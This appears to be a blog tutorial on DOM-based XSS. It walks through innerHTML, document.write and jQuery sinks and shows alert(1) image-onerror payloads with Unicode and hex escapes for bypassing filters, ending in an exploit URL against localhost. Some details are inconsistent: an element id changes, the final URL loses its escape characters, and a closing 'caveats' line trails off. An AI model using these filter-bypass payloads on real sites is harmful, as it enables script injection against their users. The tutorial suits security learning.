Dom Based XSS – Introduction

Introduction to DOM based XSS:
why to waste time in writing same thing again if you can read from online contents.
https://www.owasp.org/index.php/DOM_Based_XSS

Discovering and Exploiting:
1) Before learning DOM Based XSS, have few basics of html and JS.

< div id=”name”>hello</div>
< script>
document.getElementById(“name”).innerHTML=”aaaaaaa”;
</ script>

DomXSS1

2) aaaaa can be replaced by as follows:

< div id=”name”>hello</div>
< script>
document.getElementById(“name”).innerHTML=”<img src=1 onerror=alert(1)>”;
</ script>

DomXSS2

DomXSS3

3) This time it resulted in pop 1 but not everytime:
Javascript string of characters can be written as unicode encoding. So, < can be written as \u003c and > can be written as \u003e. You can find any online tool to do this.

< div id=”name”>hello</div>
< script>
document.getElementById(“name”).innerHTML=”\u003cimg src=1 onerror=alert(1)\u003e”;
</ script>

DomXSS4DomXSS5

4) This all seems to be ridiculous right now, but will help in the later explanation

5) Let’s analyze it through an example:
http://localhost/?gfe_rd=cr&ei=aaaaaaa&gws_rd=ssl
Relevant source code view: ( snippet)
< strong id=”titlename”>Searched by brand:aaaaaaa</strong></div>
< script>
if(“aaaaaaa”==””)
document.getElementById(“titlename”).innerHTML=”Searchable:Regions”;
if (“brand 1” == “category 1”) document.getElementById(“titlename”).innerHTML=”Search:aaaaaaa“;
if (“brand 1” == “category 2”)
document.getElementById(“titlename”).innerHTML=”Search:aaaaaaa“;
if (“brand 1” == “category 3”)
document.getElementById(“titlename”).innerHTML=”Search:aaaaaaa“;
</ script>

6) In JS string to characters, we know, < > are filtered, so how do we approach.
Let’s see.
Note: We are dealing with situations where innerHTML = [“out”]
if (“brand 1” == “category 1”)
document.getElementById(“titleshow”).innerHTML=
“Search:
\u003cimg src=1 onerror=alert(1)\u003e“;
This will result in pop1.

This is not where it ends, if space is filter out. Let’s see the payload
if (“brand 1” == “category 1”)
document.getElementById(“titleshow”).innerHTML=
“Search: \u003cimg\u0020src=1\u0020onerror=alert(1)\u003e“;

This could also result in pop1 but again filter comes into action. If \u003c and \u003e are filtered out, these are converted to &lt; and &gt;
Now what???
Now, see if \u003c is only filtered or \u0020 and \u003c bothfiltered. If only, \u003c is filtered out, we came to know that only specific keywords are filtered.
We have other ways to bypass, < can be written as \x3c and > as \x3e.

7) Final url becomes:
http://localhost/?gfe_rd=cr&ei=x3cimgu0020src=1u0020onerror=alert(1)x3e&g
ws_rd=ssl
So , finally this pops up.

This cover following DOM XSS types:
document.getElementById(“x”).innerHTML=”yyyyyyy”;
document.write(“yyyyyyy”);

There are some sites that use a third-party JS libraries, such as jQuery, there will be
$(“#x”).html(“yyyyyyy”);

Finally, of course, also we need to mention some caveats.
aa.innerHTML=”yyyyyyyyyyyy”;